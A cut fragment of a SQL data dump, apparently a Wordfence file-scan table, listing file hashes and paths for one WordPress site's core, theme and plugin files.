p-security-and-firewall/other-includes/wp-security-rename-login-feature-pre-5-2.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'60cf498d454f0dbec6a7f781f7121f42b3a786c4','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/issue-control-ignore.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'60eccce4676ed58dc475f72d7ccbc2e0de9b02de','/home/westonspirit.org.uk/public_html/wp-includes/blocks/index.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'610f2444cff52fb7996f86478fdf55edfc881d39','/home/westonspirit.org.uk/public_html/wp-includes/customize/class-wp-customize-upload-control.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'61104b4b7a9da014c0ecc9d47dce0bd63a953bbf','/home/westonspirit.org.uk/public_html/wp-admin/theme-editor.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'61242d00bceeb5b38640a240a56cd7fdadb5280a','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwenty/inc/svg-icons.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6143d47b4142fc836dbef909f2c88db5825516a8','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/sqli.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6166dba3dabcb094df11bc8a55318c5ebe9a27ec','/home/westonspirit.org.uk/public_html/wp-includes/SimplePie/Cache/DB.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'617a61f0d7a4087256b32c77c5d3530c8eb0f608','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/kits/documents/kit.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'61a087fb4c98d4edf23485644d6eaa5bb7fb4bc4','/home/westonspirit.org.uk/public_html/wp-admin/network/sites.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'61cc0e45af97e5118d1c1921f957e3e4a2ec0abc','/home/westonspirit.org.uk/public_html/wp-includes/default-constants.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'61d57340d481b7234403ebdcea958d0b1fd665a4','/home/westonspirit.org.uk/public_html/wp-admin/includes/upgrade.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'61fbdba2507264d2a1bb6b37d484d33233b5a276','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wfScan.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'621b7f4f979c2499be0dad6dbcd3e6664ecec09b','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/actions/pass.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6230ac44838f9a199a3b898fbb65fb2844dcda3f','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Exception/HTTP/Unknown.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'62519db68c93cbc22a5f3fc78674789b4f7bdf55','/home/westonspirit.org.uk/public_html/wp-admin/network/profile.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'625db6e18763ea331d9438ebf2d20941f3e4d9db','/home/westonspirit.org.uk/public_html/wp-admin/includes/revision.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'626390384789552ccaac1c4d134b82698d103a13','/home/westonspirit.org.uk/public_html/wp-includes/class-http.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6271f5590e92a904abba3dfd0326fc89f9fb37f7','/home/westonspirit.org.uk/public_html/wp-admin/upload.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'62807e820ed2264347cca5c77e18a40da5f9d637','/home/westonspirit.org.uk/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6287535c94da09657f6fcf019336faf0670b8f05','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/waf/status-tooltip-learning-mode.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'62a3620f32675237bd7f1d9f483ec82738e0cc9a','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/logger/loggers/db.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'63024fbf909d7140ccc4e37321fb26ab3432579b','/home/westonspirit.org.uk/public_html/wp-admin/includes/admin.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6305f7265ba3fda46cdc7df7a33732f663c08acf','/home/westonspirit.org.uk/public_html/wp-includes/class-walker-comment.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6340dc2efd4237ed926116d5453c418200b0c773','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6355f89433e7877b7bcfb3db80ef078ad0a1f286','/home/westonspirit.org.uk/public_html/wp-admin/network/site-new.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'63b9ffc7dbd07c84df18a9ae18fce49dfbf2c729','/home/westonspirit.org.uk/public_html/wp-includes/ID3/module.tag.id3v2.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'642b30e2e763d11d7beb9e84f199227e6916f2a9','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P3.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'644535532baa903a81d1c86deaabc2a86343b75b','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/modules-manager.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'644dbec6425bfe31a0e0f53797680293c8c63b06','/home/westonspirit.org.uk/public_html/wp-includes/widgets.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'64b4a7d638e1809b3b8a9a4974108a9c2e03b606','/home/westonspirit.org.uk/public_html/wp-admin/network/user-new.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6504aafa3e92e9fbc3b5e5cf63631b27de2b15d3','/home/westonspirit.org.uk/public_html/wp-includes/ID3/getid3.lib.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'650794ad2555dcf64e33676549b5db6eb5d7490f','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/usage/usage-reporter.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6511a8bbf2adaff8be23e66b181d51f4737a312d','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/classes/controller/db.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'653a8a18442e681270b5da8f75ed9e171870f41b','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/controls/url.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'658d3c3626492d35c7cf9a2a3510c672a96db6ea','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/controls/groups/background.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'658e7b86b5436582e6aa085cac179ab9f3301b69','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-post-type.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'65993cb5620834a97d2c4155b19631cef8f6815e','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/City.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'65b80311c70099dc4ce2d8630a558345c7ed039c','/home/westonspirit.org.uk/public_html/wp-includes/widgets/class-wp-widget-rss.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'65e687ff97f3891143e06c048b2dffc0c8aa1589','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Exception/HTTP/414.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'65eb2f6b1ad2bc357048c0258c1af2de91d1cc14','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/modules/apache.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'66189c5eadd19a82ab8d3d6742a4187d6b67bf31','/home/westonspirit.org.uk/public_html/wp-admin/includes/file.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'662c25adb2b6399fef439daeee4c478bfa94bfd0','/home/westonspirit.org.uk/public_html/wp-content/themes/twentynineteen/template-parts/header/entry-header.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'663462dbf4d52e7a559c39350003f836b4f3d56e','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/matches/referrer.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6634f28c531374840ea0a8b2b5bcc82f61024312','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/app/modules/import-export/iterator.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'663ebaae380a95318013341300cf857a20a00ffc','/home/westonspirit.org.uk/public_html/wp-includes/blocks/social-link.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'66773a3fac957346249913985a35e7581cee24ab','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/api/api-group.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6684f1e8ba327309854eaf52612dcade60de5e64','/home/westonspirit.org.uk/public_html/wp-content/plugins/akismat/index.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'66992c803aea3d2526de53c8d0a6116cac94eee2','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/composer/autoload_classmap.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'66ac4a377230d8275f63e9199d7c0b6f75fbe26e','/home/westonspirit.org.uk/public_html/wp-includes/class-snoopy.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'66ad420f0a0319365c34fad3113c6094aaf6e41c','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/matches/http-header.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'66c8185d0fb1a90316ee4e48483cf7103599e91b','/home/westonspirit.org.uk/public_html/wp-includes/sodium_compat/src/Core/Curve25519.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'66e70a46cfbcbd9a1df0996af0c0b007152fa79e','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/issue-geoipSupport.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'672b529456e6b1de73142f47eefab02ca37e2a1b','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/dynamic-tags/data-tag.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6731094cd4eb97b54e343cfbde79ef4d83a78057','/home/westonspirit.org.uk/public_html/wp-includes/session.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'67392d8a547bf854ae5d8380fc7231ecef231c04','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/Diff/Renderer/Html/Array.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'67448bd0451a198e8cf96f376ded9fd9e0076361','/home/westonspirit.org.uk/public_html/wp-activate.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'676e5ad82b2a77aa11c63d4f25433b983ed17edb','/home/westonspirit.org.uk/public_html/wp-includes/SimplePie/Cache.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6771ada1d3bb619e3f4a1d71d33b65a6ad784f3b','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/composer/ClassLoader.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'677a6e9b616e9e61e04fd1b762890268e0337a24','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wfDirectoryIterator.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'678476223ae8f1b9f2a87637fe461be436cbd46d','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wfNotification.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6785c588c541e142782fb09d45343095fb4778c3','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/classes/model/notice.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'678e2d4f7d5d446f5f03f838c527784746504d28','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-textarea.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'67c9f0eae74210a5edf3626b3429d0b23bf3e9b5','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/fileio/csv.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'67cbafcb2d12e2db1e79f6e535c008d3136460e4','/home/westonspirit.org.uk/public_html/wp-includes/ID3/module.audio-video.matroska.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'67e97726085a8f5ca91e198b6e5622069925458a','/home/westonspirit.org.uk/public_html/wp-content/themes/twentynineteen/template-parts/content/content-single.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'680a392c44288d108a8ba3348691306954b2bfec','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/blocking/blocking-create.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'68194f7c51fa63c6813a7238efb622a640918324','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Exception/HTTP/413.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'682a2718ed0247de694c04f5a04e33a47d0f8eac','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/widgets/tabs.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'684ff4e4a01ad7a555089120234a52f0bc037f90','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/wfStyle.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'68aea643d88cff86b3fcd492926a97e1a75c1429','/home/westonspirit.org.uk/public_html/wp-admin/plugins.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'68bae4bcaf7013489d2cd28509481361f618babe','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-http-curl.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'68beef64e6f222abb65f15f437b27bcc9a5146c8','/home/westonspirit.org.uk/public_html/wp-content/plugins/wp-cerber/admin/cerber-users.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'690c5fb461bcdafc0a44320ca5f5d394ef649262','/home/westonspirit.org.uk/public_html/wp-content/plugins/akismat/wjsindex.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'691d7e15cc2ec7b51a8ce3228bafc749f0644e0f','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/common/status-critical.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'69203f0689f4ee0fb0742c195df5ef31db5a912c','/home/westonspirit.org.uk/public_html/wp-includes/blocks.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'692797675d39910cca7bb1693835060e5df171ff','/home/westonspirit.org.uk/public_html/wp-includes/customize/class-wp-customize-nav-menu-name-control.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'69556028f289c7073f8734f40a7b9da7834508e6','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/managers/skins.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'696bcfec5a804c5f82b677a9b2cbcb96efe8bb04','/home/westonspirit.org.uk/public_html/wp-admin/includes/ajax-actions.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'69950a0f1acee3e34778569aaf2955cddcd3772f','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/history/revisions-manager.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'69b65d573e2a6a9863fc2c6c244171a7a332911d','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Compat.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'69c79fd3483edb96c5b39eb34f8f8b22f52ed4b9','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-theme.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'69d61c95401303f0d976881712d380d6735b564e','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/composer/installed.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'69de30b11d1ac9c3f42c2eebc8ec4b7af27572c8','/home/westonspirit.org.uk/public_html/wp-content/themes/twentynineteen/inc/block-patterns.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'69e00faffac589608afca948a73cf53f544dfa8d','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/lib/.htaccess',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6a07416f9f9f1ca752d90e462517240bc4a6524f','/home/westonspirit.org.uk/public_html/wp-content/plugins/disable-gutenberg/inc/settings-reset.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6a23e0cae18a27ad7382d4b0c8419f11cdee4c08','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/base2n.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6a271f2610c8e6505327904e772ea60a083b5535','/home/westonspirit.org.uk/public_html/wp-admin/includes/dashboard.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6a3ddd8d535efce626dc6ed2566ef383f7b98753','/home/westonspirit.org.uk/public_html/wp-includes/theme-compat/header.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6a7c15b426b3db4b5746c3c8cc24af59a5a519c6','/home/westonspirit.org.uk/public_html/wp-content/themes/newsmagbd/template-parts/content-page.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6a8788957b29976142c097598aea4fe15f0bef89','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-status.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6a8bc1400662d3456ffca8489d0088254596ec4f','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/issue-wfPluginUpgrade.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6a91549d6d8054f507717ed214792e182c5c4107','/home/westonspirit.org.uk/public_html/wp-includes/block-patterns/text-two-columns.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6ad79f88d7fde1f661be3c87d497da7b9788b25f','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/common/modules/connect/module.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6ada8ad2527c519483091bfa5514e432435789c5','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/utils/import-export/parsers/wxr-parser-regex.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6aeaa8c94e8fc047a67b5d930c19cc84cd70f006','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-php7.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6b1023a2ffcd179bfa6c41419fd10a3c8f748082','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/Ctx.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6b5c0f1eb723ad7289dae042830fd5f13f40556a','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/waf/debug.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6b8c88a5cbcffc13ad207f850c0c2279ac089bdc','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/UrlSafe.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6b935b8fac77a5c5ffa9aa8287a54068d2843c2e','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/interfaces/group-control.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6ba9a0e23fa187fd5011c27208e58d30aca50a29','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/compatibility-tag/module.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6bb8f2e8693c3490c8f54d8ac74b04356bfa7bde','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/editor-templates/panel-elements.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6bd3677745e3b6943b6d6f3820b4642fed66dc37','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/models/url/url-transform.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6be8d5892e50ac87abb3b469065c587731208c88','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/controls/tab.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6c01c7e685058a734cb707d7b3e8300f1905a7cf','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/controls/text.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6c16e9854b8521b3ab30c3d5c555f4dab5119d0c','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/widgets/icon.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6c21b763b6e69fc73f401cda3a347ee1727de9b1','/home/westonspirit.org.uk/public_html/wp-includes/block-patterns/text-three-columns-buttons.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6c318c6c41f9f8aeb3e898728e9b3925898c8077','/home/westonspirit.org.uk/public_html/wp-admin/includes/ms-deprecated.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6c5019b0734bb3e637c14d2344d0d09f46988e58','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Enterprise.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6c6d7255ad95e48d94c3c07aa1dd423e9d2bac4f','/home/westonspirit.org.uk/public_html/wp-includes/theme-compat/footer-embed.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6c93523f7826a21d2071237d36d63cd5255eba6e','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/core/files/base.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6ca0031b2e1c164b77535cc3b78efa921e5bcd58','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-wp-ms-themes-list-table.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6d06133f18ac9c787061e16d28ac473cd0b9c63c','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/editor-templates/library-layout.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6d143b80af10678ebd1853474e2ab2942897e528','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/models/regex.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6d194228a787559f12c303a7cec96472deeff4d3','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/models/redirect/redirect-sanitizer.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6d4d10d555607782d2871ccc6f6eb518a2630568','/home/westonspirit.org.uk/public_html/wp-includes/shortcodes.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6d8d1321a0279da9ffc25f6289700e0ba9df66f5','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/modules/login-security/views/page/page.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6d8ff348068e5ea5feb4806bcbf4b684fe4399b4','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/api/api-redirect.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6dff905f9126f0aef56f6a25f4798c2dae331c93','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/heartbeat.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6e32af567c92310964a2bcdc1c76507f25aa27c7','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/widgets/image-carousel.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6eb39f7ae79b3f38369ab35e709ecbe14833049b','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/modules/shapes/widgets/text-path.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6f09dea2ddeee2af2dbc9788373cd2cb626c70c3','/home/westonspirit.org.uk/public_html/wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6f22275bf6d401c4f20b4ffeb1f7ca0205556c55','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/views/scanner/no-issues.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6f5b3ce75a36202106e3633ebadaec95d6dcd176','/home/westonspirit.org.uk/public_html/wp-admin/includes/class-plugin-installer-skin.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6f88183934b29daafa1e9d43b037631a4a682c8a','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/controls/animation.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6f94498d5baccf037d0f50c83ba6319fffe6573b','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/parser.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6f9b97cb484395d1a94a5f5f8817e8b12fe7e6b8','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-general-init-tasks.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6fe0d28e385b4dcb4ec2620965f1408c8e05fd61','/home/westonspirit.org.uk/public_html/wp-includes/widgets/class-wp-widget-archives.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'6ff7d3e8785399c1cbdaff5374fcbae71ed31503','/home/westonspirit.org.uk/public_html/wp-includes/class-wp-customize-setting.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7007d2388c579295a865529e8fd70c838532b060','/home/westonspirit.org.uk/public_html/wp-admin/options-privacy.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7026af073fa9ec5a2abc1afa485ee811de925cd8','/home/westonspirit.org.uk/public_html/wp-includes/rest-api/endpoints/class-wp-rest-block-renderer-controller.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'702b68d07ad4ad0a7285623bce8d0f7463fb8202','/home/westonspirit.org.uk/public_html/wp-includes/SimplePie/Credit.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'702f8a44dbd4fa3cdb6661efc945b1edbfe1454a','/home/westonspirit.org.uk/public_html/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Compat.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'706e04e74207d68ad419840f94b3ddc4938e1771','/home/westonspirit.org.uk/public_html/wp-content/plugins/elementor/includes/template-library/manager.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'70af21049cba3cac8163ff17eac016b79c5b3e08','/home/westonspirit.org.uk/public_html/wp-includes/block-patterns/three-buttons.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'7127afa8d713368514b130d09cb3c4ecd469c087','/home/westonspirit.org.uk/public_html/wp-admin/post-new.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'71407b3626675457c29df03011a4a42654f56b32','/home/westonspirit.org.uk/public_html/wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-chat.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'717949f9f7e34df7a87ec8e70de52d0749676f6c','/home/westonspirit.org.uk/public_html/wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-backup.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'717a0012f124a10301deaa8c9432ec20c684dce4','/home/westonspirit.org.uk/public_html/wp-includes/Requests/Exception/HTTP/401.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'717c8900fa10b7526bee6da8b0bd58313cf441a6','/home/westonspirit.org.uk/public_html/wp-content/plugins/redirection/matches/from-url.php',0,'','','',0,0,0,0,0,'',''),(1629897503,1,0,0,0,0,'71b11f28dfadd7a9dfa00130585a0b31df2d751e','/home/westonspirit.org.uk/p